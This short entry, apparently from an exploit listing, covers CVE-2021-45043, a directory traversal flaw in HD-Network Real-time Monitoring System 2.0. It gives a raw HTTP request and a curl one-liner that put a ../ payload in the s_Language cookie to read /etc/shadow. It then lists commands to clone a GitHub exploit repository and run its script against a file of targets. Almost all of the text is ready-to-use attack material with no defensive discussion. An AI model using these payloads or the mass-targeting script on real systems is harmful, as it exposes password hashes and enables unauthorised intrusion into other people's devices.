HD-Network Real-time Monitoring System 2.0 allows ../ directory traversal to read /etc/shadow via the /language/lang s_Language parameter.
https://cyberguy0xd1.medium.com/my-cve-2021-45043-lfi-write-up-441dad30dd7f
GET /language/lang HTTP/1.1 Host: IP.target Cookie: s_Language=../../../../../../../../../../../../../../etc/shadow
curl -k -s -H "Cookie: s_Language=../../../../../../../../../../../../../../etc/shadow" -X GET http://IP.target/language/lang
git clone https://github.com/g30rgyth3d4rk/cve-2021-45043.git
cd cve-2021-45043/
chmod +x script.sh
./script.sh targets.txt